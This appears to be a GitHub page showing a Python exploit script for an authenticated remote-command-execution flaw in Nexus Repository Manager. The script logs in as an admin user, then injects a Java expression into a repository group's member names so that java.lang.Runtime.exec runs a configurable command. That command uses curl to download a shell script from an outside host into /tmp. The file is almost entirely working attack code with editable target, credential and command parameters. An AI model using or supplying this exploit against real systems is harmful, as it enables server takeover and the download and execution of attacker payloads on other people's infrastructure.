-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
48 lines (44 loc) · 1.39 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/python3
# Tested for linux
# Original Author: Alvaro Muñoz
import sys
import base64
import requests
# Change this parameters
URL='http://192.168.197.159:8081'
CMD='curl -so /tmp/try.sh http://192.168.45.223:445/try.sh'
USERNAME='admin'
PASSWORD='test123'
s = requests.Session()
print('Logging in')
body = {
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
print('Login unsuccessful')
print(r.status_code)
sys.exit(1)
print('Logged in successfully')
body = {
'name': 'internal',
'online': True,
'storage': {
'blobStoreName': 'default',
'strictContentTypeValidation': True
},
'group': {
'memberNames': [
# Updated payload from: $\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
"${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\""+CMD+"\")}"
]
},
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
print('Command executed')
sys.exit(0)
else:
print('Error executing command, the following was returned by Nexus')
print(r.text)